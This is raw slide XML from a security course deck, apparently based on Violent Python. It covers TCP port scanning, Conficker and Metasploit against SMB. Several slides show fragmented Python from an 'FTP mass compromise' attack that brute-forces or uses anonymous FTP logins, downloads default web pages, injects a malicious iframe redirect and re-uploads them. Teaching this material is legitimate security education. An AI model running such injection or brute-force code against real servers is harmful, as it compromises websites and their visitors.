              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[-] Exception: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</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return</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ret_list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 []</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for</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file</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in</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dir_list</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fn</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56B6C2"/>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file</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>lower</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if</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'.php'</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in</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fn</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or</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'.htm'</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in</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fn</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or</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98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'.asp'</a:t>
            </a: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in</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fn</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'[+] Found default page: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</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ret_list</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61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>append</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="14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00"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ABB2BF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ret_list</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="14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2073b6da4c1_0_36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683;g2073b6da4c1_0_36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2100450"/>
            <a:ext cx="11416500" cy="462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inject_page</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redirect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with</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'.tmp'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'w'</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retrlines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'RETR '</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Downloaded Page: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redirect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Injected Malicious IFrame on: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storlines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'STOR '</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'.tmp'</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Uploaded Injected Page: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page</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attack</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redirect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ftplib</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login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def_pages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return_default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def_page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def_pages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inject_page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ftp</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def_page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redirect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g2073b6da4c1_0_41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Google Shape;689;g2073b6da4c1_0_41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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parse_args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tgt_hosts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.tgt_hosts).</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>split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redirect_html</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.r</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pass_file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.f</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tgt_hosts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None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D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>None</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anon_login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'anonymous'</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'me@your.com'</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Using Anonymous Creds to attack'</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attack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redirect_html</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rgbClr val="282C34"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </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e9adf94182_2_34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="8514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TCP Full Connect Scan </a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;g1e9adf94182_2_34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148400" y="2107725"/>
            <a:ext cx="11390700" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>So let's begin by writing our own TCP port scanner that utilizes a TCP full connect scan to identify hosts. To begin, we will import the Python implementation of BSD socket APL The socket API provides us with some functions that will be useful in implementing our ICP port scanner </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>socket.gethostbyname (hostname) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>- This function takes a hostname such as www.syngress.com and returns an IPv4 address format such as 69.163.177.2.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>socket.gethostbyaddr(ip address) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>- This function takes an IPv4 address and returns a triple containing the hostname, alternative list of host names, and a list of 1Pv4/v6 addresses for the same interface on the host.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="469900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">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g2073b6da4c1_0_46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245525" y="753225"/>
            <a:ext cx="100485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FTP mass compromise by bridging FTP and WEB Code</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Google Shape;695;g2073b6da4c1_0_46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406375" y="2181500"/>
            <a:ext cx="11416500" cy="4548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elif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pass_file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brute_login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pass_file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passwd</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Using Brute-forced Creds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passwd</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 to '</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'attack'</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attack</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redirect_html</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E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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g1e9a65c21fa_36_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="9005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Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3040"/>
              <a:t>CONFICKER, WHY TRYING HARD IS ALWAYS GOOD ENOUGH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3040"/>
            </a:br>
            <a:endParaRPr sz="3040"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;g1e9a65c21fa_36_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11209200" cy="35994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lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In late November of 2008, computer security experts woke up to an interest ing and game-changing worm. The Conficker or W32DownandUp Worm spread so rapidly that it infected five million computers in more than 200 countries (Markoff, 2009). </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>While some of the advanced methods (digital signatures, encrypted payloads, and alternative propagation schemes) aided in the attack, Conficker at its very heart, holds some similarities in attack vectors to the Morris Worm of 1988 (Nahorney, 2009). In the following pages, we will recreate the primary attack vectors for Conficker.</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_36_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="9005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Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3040"/>
              <a:t>CONFICKER, WHY TRYING HARD IS ALWAYS GOOD ENOUGH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3040"/>
            </a:br>
            <a:endParaRPr sz="3040"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707" name="Google Shape;707;g1e9a65c21fa_36_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3258684"/>
            <a:ext cx="11802358" cy="3599316"/>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sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes the Conficker worm, which is a computer worm that was first discovered in late November 2008. The worm was able to spread rapidly and infected five million computers in more than 200 countries. This worm uses multiple methods for spreading, including exploiting known vulnerabilities in operating systems, stealing login credentials, and spreading via removable drives.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Conficker at its core, has some similarities in attack vectors to the Morris worm of 1988. The Morris worm, was one of the first computer worms distributed via the Internet, it also exploited known vulnerabilities in operating systems and spread rapidly. The Conficker worm was able to spread rapidly due to its advanced methods such as using digital signatures, encrypted payloads, and alternative propagation schemes.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;g1e9a65c21fa_36_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="2331131"/>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g1e9a65c21fa_36_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="9005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40"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3040"/>
              <a:t>CONFICKER, WHY TRYING HARD IS ALWAYS GOOD ENOUGH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3040"/>
            </a:br>
            <a:endParaRPr sz="3040"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="Google Shape;714;g1e9a65c21fa_36_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393771" y="2421059"/>
            <a:ext cx="11197500" cy="35994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sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The statement also mentions that the following pages will recreate the primary attack vectors for Conficker. This means that the author will demonstrate how the Conficker worm spreads and how it can be used to compromise systems. It's important to note that this kind of worm is a serious security concern and highlights the importance of keeping your software and systems up to date to prevent known vulnerabilities, use strong and unique credentials, and monitor logs for any suspicious activities.</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_41_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148396" y="8023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Attacking the Windows SMB Service with Metasploit</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Google Shape;720;g1e9a65c21fa_41_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11069700" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To simplify our attack we will utilize the Metasploit Framework, available for download from: http://metasploit.com/download/. The open source computer security project, Metasploit, has risen to quick popularity to become the de facto exploitation toolkit over the last eight years. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="354331" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
